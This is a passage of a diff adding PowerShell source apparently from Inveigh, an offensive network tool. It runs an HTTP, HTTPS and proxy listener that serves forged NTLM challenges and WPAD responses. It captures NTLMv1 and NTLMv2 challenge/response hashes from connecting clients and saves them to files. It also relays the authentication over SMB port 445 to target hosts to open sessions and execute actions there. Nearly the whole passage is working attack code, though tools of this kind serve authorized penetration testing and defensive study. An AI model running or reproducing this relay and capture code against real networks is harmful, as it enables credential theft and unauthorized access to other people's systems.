+ {
+ $inveigh.target_list.Remove($Target)
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay auto disabled due to success") > $null
+ $inveigh.SMB_relay = $false
+ }
+ elseif(!$SMB_relay_failed -and $Attack -ne 'Session')
+ {
+ $inveigh.target_list.Remove($Target)
+ }
+
+ if($Attack -eq 'Session')
+ {
+ return $SMB_administrator
+ }
+ else
+ {
+ $SMB_relay_socket.Close()
+ }
+
+ }
+
+}
+
+# HTTP/HTTPS/Proxy Server ScriptBlock
+$HTTP_scriptblock =
+{
+ param ($Attack,$Challenge,$Command,$HTTPIP,$HTTPPort,$HTTPResetDelay,$HTTPResetDelayTimeout,$HTTPS_listener,
+ $Proxy,$ProxyIgnore,$proxy_listener,$RelayAutoDisable,$Service,$SMB_version,$SessionLimit,$SessionPriority,
+ $Target,$Username,$WPADAuth,$WPADAuthIgnore,$WPADResponse)
+
+ function NTLMChallengeBase64
+ {
+ param ([String]$Challenge,[String]$ClientIPAddress,[Int]$ClientPort)
+
+ $HTTP_timestamp = Get-Date
+ $HTTP_timestamp = $HTTP_timestamp.ToFileTime()
+ $HTTP_timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_timestamp))
+ $HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+
+ if($Challenge)
+ {
+ $HTTP_challenge = $Challenge
+ $HTTP_challenge_bytes = $HTTP_challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-')
+ $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ }
+ else
+ {
+ $HTTP_challenge_bytes = [String](1..8 | ForEach-Object{"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+ $HTTP_challenge = $HTTP_challenge_bytes -replace ' ',''
+ $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ }
+
+ $inveigh.HTTP_challenge_queue.Add($ClientIPAddress + $ClientPort + ',' + $HTTP_challenge) > $null
+
+ $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38,
+ 0x00,0x00,0x00,0x05,0x82,0x89,0xa2 +
+ $HTTP_challenge_bytes +
+ 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06,
+ 0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00,
+ 0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54,
+ 0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,
+ 0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24,
+ 0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,
+ 0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,
+ 0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,
+ 0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 +
+ $HTTP_timestamp +
+ 0x00,0x00,0x00,0x00,0x0a,0x0a
+
+ $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
+ $NTLM = 'NTLM ' + $NTLM_challenge_base64
+ $NTLM_challenge = $HTTP_challenge
+
+ return $NTLM
+ }
+
+ if($HTTPS_listener)
+ {
+ $HTTP_type = "HTTPS"
+ }
+ elseif($proxy_listener)
+ {
+ $HTTP_type = "Proxy"
+ }
+ else
+ {
+ $HTTP_type = "HTTP"
+ }
+
+ if($HTTPIP -ne '0.0.0.0')
+ {
+ $HTTPIP = [System.Net.IPAddress]::Parse($HTTPIP)
+ $HTTP_endpoint = New-Object System.Net.IPEndPoint($HTTPIP,$HTTPPort)
+ }
+ else
+ {
+ $HTTP_endpoint = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::any,$HTTPPort)
+ }
+
+ $HTTP_running = $true
+ $HTTP_listener = New-Object System.Net.Sockets.TcpListener $HTTP_endpoint
+ $HTTP_client_close = $true
+ $relay_step = 0
+
+ if($proxy_listener)
+ {
+ $HTTP_linger = New-Object System.Net.Sockets.LingerOption($true,0)
+ $HTTP_listener.Server.LingerState = $HTTP_linger
+ }
+
+ try
+ {
+ $HTTP_listener.Start()
+ }
+ catch
+ {
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Error starting $HTTP_type listener")
+ $HTTP_running = $false
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("[-] [$(Get-Date -format s)] Error starting $HTTP_type listener")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("[-] [$(Get-Date -format s)] Error starting $HTTP_type listener")
+ }
+
+ }
+
+ :HTTP_listener_loop while($inveigh.relay_running -and $HTTP_running)
+ {
+ $TCP_request = ""
+ $TCP_request_bytes = New-Object System.Byte[] 4096
+ $HTTP_send = $true
+ $HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("text/html")
+ $HTTP_header_cache_control = ""
+ $HTTP_header_authenticate = ""
+ $HTTP_header_authenticate_data = ""
+ $HTTP_message = ""
+ $HTTP_header_authorization = ""
+ $HTTP_header_host = ""
+ $HTTP_header_user_agent = ""
+ $HTTP_request_raw_URL = ""
+ $NTLM = "NTLM"
+
+ while(!$HTTP_listener.Pending() -and !$HTTP_client.Connected)
+ {
+ Start-Sleep -m 10
+
+ if(!$inveigh.relay_running)
+ {
+ break HTTP_listener_loop
+ }
+
+ }
+
+ if($relay_step -gt 0)
+ {
+ $relay_reset++
+
+ if($relay_reset -gt 2)
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay attack resetting") > $null
+ $SMB_relay_socket.Close()
+ $relay_step = 0
+ }
+
+ }
+ else
+ {
+ $relay_reset = 0
+ }
+
+ if($HTTPS_listener)
+ {
+
+ if(!$HTTP_client.Connected -or $HTTP_client_close -and $inveigh.relay_running)
+ {
+ $HTTP_client = $HTTP_listener.AcceptTcpClient()
+ $HTTP_clear_stream = $HTTP_client.GetStream()
+ $HTTP_stream = New-Object System.Net.Security.SslStream($HTTP_clear_stream,$false)
+ $SSL_cert = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Subject -match $inveigh.certificate_CN})
+ $HTTP_stream.AuthenticateAsServer($SSL_cert,$false,[System.Security.Authentication.SslProtocols]::Default,$false)
+ }
+
+ [byte[]]$SSL_request_bytes = $null
+
+ do
+ {
+ $HTTP_request_byte_count = $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length)
+ $SSL_request_bytes += $TCP_request_bytes[0..($HTTP_request_byte_count - 1)]
+ } while ($HTTP_clear_stream.DataAvailable)
+
+ $TCP_request = [System.BitConverter]::ToString($SSL_request_bytes)
+ }
+ else
+ {
+
+ if(!$HTTP_client.Connected -or $HTTP_client_close -and $inveigh.relay_running)
+ {
+ $HTTP_client = $HTTP_listener.AcceptTcpClient()
+ $HTTP_stream = $HTTP_client.GetStream()
+ }
+
+ if($HTTP_stream.DataAvailable)
+ {
+ $HTTP_data_available = $true
+ }
+ else
+ {
+ $HTTP_data_available = $false
+ }
+
+ while($HTTP_stream.DataAvailable)
+ {
+ $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length)
+ }
+
+ $TCP_request = [System.BitConverter]::ToString($TCP_request_bytes)
+ }
+
+ if($TCP_request -like "47-45-54-20*" -or $TCP_request -like "48-45-41-44-20*" -or $TCP_request -like "4f-50-54-49-4f-4e-53-20*" -or $TCP_request -like "43-4f-4e-4e-45-43-54*")
+ {
+ $HTTP_raw_URL = $TCP_request.Substring($TCP_request.IndexOf("-20-") + 4,$TCP_request.Substring($TCP_request.IndexOf("-20-") + 1).IndexOf("-20-") - 3)
+ $HTTP_raw_URL = $HTTP_raw_URL.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $HTTP_request_raw_URL = New-Object System.String ($HTTP_raw_URL,0,$HTTP_raw_URL.Length)
+ $HTTP_source_IP = $HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString
+
+ if($TCP_request -like "*-48-6F-73-74-3A-20-*")
+ {
+ $HTTP_header_host_extract = $TCP_request.Substring($TCP_request.IndexOf("-48-6F-73-74-3A-20-") + 19)
+ $HTTP_header_host_extract = $HTTP_header_host_extract.Substring(0,$HTTP_header_host_extract.IndexOf("-0D-0A-"))
+ $HTTP_header_host_extract = $HTTP_header_host_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $HTTP_header_host = New-Object System.String ($HTTP_header_host_extract,0,$HTTP_header_host_extract.Length)
+ }
+
+ if($TCP_request -like "*-55-73-65-72-2D-41-67-65-6E-74-3A-20-*")
+ {
+ $HTTP_header_user_agent_extract = $TCP_request.Substring($TCP_request.IndexOf("-55-73-65-72-2D-41-67-65-6E-74-3A-20-") + 37)
+ $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Substring(0,$HTTP_header_user_agent_extract.IndexOf("-0D-0A-"))
+ $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $HTTP_header_user_agent = New-Object System.String ($HTTP_header_user_agent_extract,0,$HTTP_header_user_agent_extract.Length)
+ }
+
+ if($HTTP_request_raw_URL_old -ne $HTTP_request_raw_URL -or $HTTP_client_handle_old -ne $HTTP_client.Client.Handle)
+ {
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type user agent received from $HTTP_source_IP`:`n$HTTP_header_user_agent")
+
+ if($Proxy -eq 'Y' -and $ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_}))
+ {
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")
+ }
+
+ }
+
+ if($TCP_request -like "*-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-*")
+ {
+ $HTTP_header_authorization_extract = $TCP_request.Substring($TCP_request.IndexOf("-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-") + 46)
+ $HTTP_header_authorization_extract = $HTTP_header_authorization_extract.Substring(0,$HTTP_header_authorization_extract.IndexOf("-0D-0A-"))
+ $HTTP_header_authorization_extract = $HTTP_header_authorization_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $HTTP_header_authorization = New-Object System.String ($HTTP_header_authorization_extract,0,$HTTP_header_authorization_extract.Length)
+ }
+
+ if(($HTTP_request_raw_URL -notmatch '/wpad.dat' -and $HTTPAuth -eq 'Anonymous') -or ($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous') -or (
+ $HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -like 'NTLM*' -and $WPADAuthIgnore.Count -gt 0 -and ($WPADAuthIgnore | Where-Object {$HTTP_header_user_agent -match $_})))
+ {
+ $HTTP_response_status_code = 0x32,0x30,0x30
+ $HTTP_response_phrase = 0x4f,0x4b
+ $HTTP_client_close = $true
+ }
+ else
+ {
+
+ if($proxy_listener)
+ {
+ $HTTP_response_status_code = 0x34,0x30,0x37
+ $HTTP_header_authenticate = 0x50,0x72,0x6f,0x78,0x79,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20
+ }
+ else
+ {
+ $HTTP_response_status_code = 0x34,0x30,0x31
+ $HTTP_header_authenticate = 0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20
+
+ if($HTTP_request_raw_URL -match '/wpad.dat')
+ {
+ $HTTP_reset_delay = $true
+ $HTTP_reset_delay_timeout = New-TimeSpan -Seconds $HTTPResetDelayTimeout
+ $HTTP_reset_delay_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+ }
+
+ }
+
+ $HTTP_response_phrase = 0x55,0x6e,0x61,0x75,0x74,0x68,0x6f,0x72,0x69,0x7a,0x65,0x64
+ $HTTP_client_close = $false
+ }
+
+ if($HTTP_header_authorization.StartsWith('NTLM '))
+ {
+ $HTTP_header_authorization = $HTTP_header_authorization -replace 'NTLM ',''
+ [Byte[]]$HTTP_request_bytes = [System.Convert]::FromBase64String($HTTP_header_authorization)
+
+ if([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '01-00-00-00')
+ {
+
+ if($attack -eq 'Session')
+ {
+ $target = $null
+
+ ForEach($target_entry in $inveigh.target_list)
+ {
+
+ if(!$target)
+ {
+
+ if($HTTP_source_IP -ne $target_entry -and ($inveigh.session_list | Where-Object {$_.Initiator -eq $HTTP_source_IP -and $_.Target -eq $target_entry -and $_.Status -eq 'connected'} | Measure-Object).Count -lt $SessionLimit)
+ {
+ $target = $target_entry
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Selected $target as relay target")
+ }
+
+ }
+
+ }
+
+ if(!$target -and $SessionPriority -eq 'Y')
+ {
+
+ ForEach($target_entry in $inveigh.target_list)
+ {
+
+ if(!$target)
+ {
+
+ if($HTTP_source_IP -ne $target_entry -and ($inveigh.session_list | Where-Object {$_.Privileged -eq 'yes' -and $_.Target -eq $target_entry -and $_.Status -eq 'connected'} | Measure-Object).Count -lt $SessionLimit)
+ {
+ $target = $target_entry
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Selected $target as relay target")
+ }
+
+ }
+
+ }
+
+ }
+
+ }
+ else
+ {
+ $target = $null
+
+ ForEach($target_entry in $inveigh.target_list)
+ {
+
+ if(!$target)
+ {
+
+ if($HTTP_source_IP -ne $target_entry -and !$inveigh.relay_list.Contains("$HTTP_source_IP $target_entry"))
+ {
+ $target = $target_entry
+ }
+
+ }
+
+ }
+
+ if(!$target)
+ {
+ $target = $inveigh.target_list[(Get-Random -Maximum $inveigh.target_list.Count)]
+ }
+
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Selected $target as relay target")
+ }
+
+ if($inveigh.SMB_relay -and $relay_step -eq 0 -and ($target -and $HTTP_source_IP -ne $target))
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type to SMB relay initiated by $HTTP_source_IP")
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Grabbing challenge for relay from $target")
+ $SMB_relay_socket = New-Object System.Net.Sockets.TCPClient
+ $SMB_relay_socket.Client.ReceiveTimeout = 60000
+ $SMB_relay_socket.Connect($Target,"445")
+ $HTTP_client_close = $false
+ $relay_step = 1
+
+ if(!$SMB_relay_socket.connected)
+ {
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Relay target is not responding")
+ $relay_step = 0
+ }
+
+ if($relay_step -eq 1)
+ {
+ $SMB_relay_bytes = SMBRelayChallenge $SMB_relay_socket $HTTP_request_bytes $SMB_version
+
+ if($SMB_relay_bytes.Length -le 3)
+ {
+ $relay_step = 0
+ $NTLM = NTLMChallengeBase64 $Challenge $HTTP_source_IP $HTTP_client.Client.RemoteEndpoint.Port
+ }
+
+ }
+
+ if($relay_step -eq 1)
+ {
+ $SMB_user_ID = $SMB_relay_bytes[34..33]
+ $SMB_relay_NTLMSSP = [System.BitConverter]::ToString($SMB_relay_bytes)
+ $SMB_relay_NTLMSSP = $SMB_relay_NTLMSSP -replace "-",""
+ $SMB_relay_NTLMSSP_index = $SMB_relay_NTLMSSP.IndexOf("4E544C4D53535000")
+ $SMB_relay_NTLMSSP_bytes_index = $SMB_relay_NTLMSSP_index / 2
+ $SMB_domain_length = DataLength2 ($SMB_relay_NTLMSSP_bytes_index + 12) $SMB_relay_bytes
+ $SMB_domain_length_offset_bytes = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 12)..($SMB_relay_NTLMSSP_bytes_index + 19)]
+ $SMB_target_length = DataLength2 ($SMB_relay_NTLMSSP_bytes_index + 40) $SMB_relay_bytes
+ $SMB_target_length_offset_bytes = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 40)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length)]
+ $SMB_relay_target_flag = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 22)]
+ $SMB_relay_NTLM_challenge = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 24)..($SMB_relay_NTLMSSP_bytes_index + 31)]
+ $SMB_relay_target_details = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 56 + $SMB_domain_length)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length + $SMB_target_length)]
+ $SMB_session_ID = $SMB_relay_bytes[44..51]
+
+ if([System.BitConverter]::ToString($SMB_relay_bytes[4..7]) -eq 'ff-53-4d-42')
+ {
+ $SMB_version -eq 'SMB1'
+ }
+
+ $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00 +
+ $SMB_domain_length_offset_bytes +
+ 0x05,0x82 +
+ $SMB_relay_target_flag +
+ 0xa2 +
+ $SMB_relay_NTLM_challenge +
+ 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 +
+ $SMB_target_length_offset_bytes +
+ $SMB_relay_target_details
+
+ $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
+ $NTLM = 'NTLM ' + $NTLM_challenge_base64
+ $NTLM_challenge = SMBNTLMChallenge $SMB_relay_bytes
+ $inveigh.HTTP_challenge_queue.Add($HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + ',' + $NTLM_challenge)
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Received challenge $NTLM_challenge for relay from $Target")
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Providing challenge $NTLM_challenge for relay to $HTTP_source_IP")
+ $relay_step = 2
+ }
+ else
+ {
+ $NTLM = NTLMChallengeBase64 $Challenge $HTTP_source_IP $HTTP_client.Client.RemoteEndpoint.Port
+ }
+
+ }
+ else
+ {
+
+ if(!$target)
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted due to lack of an eligible target")
+ }
+ elseif($HTTP_source_IP -ne $Target)
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted relay due to initiator matching $target")
+ }
+
+ $NTLM = NTLMChallengeBase64 $Challenge $HTTP_source_IP $HTTP_client.Client.RemoteEndpoint.Port
+ }
+
+ }
+ elseif([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '03-00-00-00')
+ {
+ $HTTP_NTLM_length = DataLength2 20 $HTTP_request_bytes
+ $HTTP_NTLM_offset = DataLength4 24 $HTTP_request_bytes
+ $HTTP_NTLM_domain_length = DataLength2 28 $HTTP_request_bytes
+ $HTTP_NTLM_domain_offset = DataLength4 32 $HTTP_request_bytes
+ [String]$NTLM_challenge = $inveigh.HTTP_challenge_queue -like $HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + '*'
+ $inveigh.HTTP_challenge_queue.Remove($NTLM_challenge)
+ $NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(",")) + 1)
+
+ if($HTTP_NTLM_domain_length -eq 0)
+ {
+ $HTTP_NTLM_domain_string = ''
+ }
+ else
+ {
+ $HTTP_NTLM_domain_string = DataToString $HTTP_NTLM_domain_offset $HTTP_NTLM_domain_length $HTTP_request_bytes
+ }
+
+ $HTTP_NTLM_user_length = DataLength2 36 $HTTP_request_bytes
+ $HTTP_NTLM_user_offset = DataLength4 40 $HTTP_request_bytes
+
+ if($HTTP_NTLM_user_length -gt 0)
+ {
+ $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes
+ }
+ else
+ {
+ $HTTP_NTLM_user_string = ""
+ }
+
+ $HTTP_username_full = $HTTP_NTLM_domain_string + "\" + $HTTP_NTLM_user_string
+ $HTTP_NTLM_host_length = DataLength2 44 $HTTP_request_bytes
+ $HTTP_NTLM_host_offset = DataLength4 48 $HTTP_request_bytes
+ $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_offset $HTTP_NTLM_host_length $HTTP_request_bytes
+
+ if($HTTP_NTLM_length -eq 24) # NTLMv1
+ {
+ $NTLM_type = "NTLMv1"
+ $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[($HTTP_NTLM_offset - 24)..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-",""
+ $NTLM_response = $NTLM_response.Insert(48,':')
+ $HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_response + ":" + $NTLM_challenge
+
+ if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
+ {
+ $inveigh.NTLMv1_list.Add($HTTP_NTLM_hash)
+
+ if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full"))
+ {
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash")
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_username_full - not unique")
+ }
+
+ if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")))
+ {
+ $inveigh.NTLMv1_file_queue.Add($HTTP_NTLM_hash)
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response written to " + $inveigh.NTLMv1_out_file)
+ }
+
+ if($inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")
+ {
+ $inveigh.NTLMv1_username_list.Add("$HTTP_source_IP $HTTP_username_full")
+ }
+
+ }
+
+ }
+ else # NTLMv2
+ {
+ $NTLM_type = "NTLMv2"
+ $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[$HTTP_NTLM_offset..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-",""
+ $NTLM_response = $NTLM_response.Insert(32,':')
+ $HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLM_response
+
+ if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
+ {
+ $inveigh.NTLMv2_list.Add($HTTP_NTLM_hash)
+
+ if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full"))
+ {
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash")
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_username_full - not unique")
+ }
+
+ if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")))
+ {
+ $inveigh.NTLMv2_file_queue.Add($HTTP_NTLM_hash)
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file)
+ }
+
+ if($inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")
+ {
+ $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_username_full")
+ }
+
+ }
+
+ }
+
+ $HTTP_response_status_code = 0x32,0x30,0x30
+ $HTTP_response_phrase = 0x4f,0x4b
+ $HTTP_client_close = $true
+ $NTLM_challenge = ""
+
+ if($inveigh.SMB_relay -and $relay_step -eq 2)
+ {
+
+ if(!$Username -or $Username -contains $HTTP_NTLM_user_string -or $Username -contains "$HTTP_username_full")
+ {
+
+ if($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))
+ {
+
+ if($inveigh.relay_user_failed_list -notcontains "$HTTP_source_IP $HTTP_username_full $Target")
+ {
+
+ if(($inveigh.session_list | Where-Object {$_.User -eq $HTTP_username_full -and $_.Target -eq $target -and $_.Status -eq 'connected'} | Measure-Object).Count -lt $SessionLimit)
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Sending $NTLM_type response for $HTTP_username_full for relay to $Target")
+ $SMB_relay_failed = SMBRelayResponse $SMB_relay_socket $HTTP_request_bytes $SMB_version $SMB_user_ID $SMB_session_ID
+
+ if(!$SMB_relay_failed)
+ {
+
+ if($Attack -eq 'Session')
+ {
+ $inveigh.session_socket_table[$inveigh.session_count] = $SMB_relay_socket
+ $inveigh.session_table[$inveigh.session_count] = $SMB_session_ID
+ $inveigh.session_message_ID_table[$inveigh.session_count] = 3
+ $inveigh.session_lock_table[$inveigh.session_count] = 'open'
+ $session_privilege = SMBRelayExecute $SMB_relay_socket $SMB_version $SMB_user_ID $SMB_session_ID
+ $session_object = New-Object PSObject
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Session $inveigh.session_count
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Target $SMB_relay_socket.Client.RemoteEndpoint.Address.IPaddressToString
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Initiator $HTTP_source_IP
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name User $HTTP_username_full
+
+ if($session_privilege)
+ {
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Privileged "yes"
+ }
+ else
+ {
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Privileged "no"
+ }
+
+ if($SMB_relay_socket.Connected)
+ {
+ $status = "connected"
+ }
+ else
+ {
+ $status = "disconnected"
+ }
+
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Status $status
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name "Established" $(Get-Date -format s)
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name "Last Activity" $(Get-Date -format s)
+ $inveigh.session_list += $session_object
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Sesion $($inveigh.session_count) added to session list")
+ $inveigh.session_count++
+ }
+ else
+ {
+ SMBRelayExecute $SMB_relay_socket $SMB_version $SMB_user_ID $SMB_session_ID
+ }
+
+ }
+
+ $relay_step = 0
+
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted since $HTTP_username_full has reached session limit on $Target")
+ $SMB_relay_socket.Close()
+ $relay_step = 0
+ }
+
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted since $HTTP_username_full has already been tried on $Target")
+ $SMB_relay_socket.Close()
+ $relay_step = 0
+ }
+
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Aborting relay since $HTTP_NTLM_user_string appears to be a machine account")
+ $SMB_relay_socket.Close()
+ $relay_step = 0
+ }
+
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full not on relay username list")
+ $SMB_relay_socket.Close()
+ $relay_step = 0
+ }
+
+ }
+
+ if($proxy_listener)
+ {
+ $HTTP_send = $false
+ }
+
+ }
+ else
+ {
+ $HTTP_client_close = $false
+ }
+
+ }
+
+ if(!$proxy_listener -and $WPADResponse -and $HTTP_request_raw_URL -match '/wpad.dat' -and (!$ProxyIgnore -or !($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_})))
+ {
+ $HTTP_message = $WPADResponse
+ $HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("application/x-ns-proxy-autoconfig")
+ }
+
+ $HTTP_timestamp = Get-Date -format r
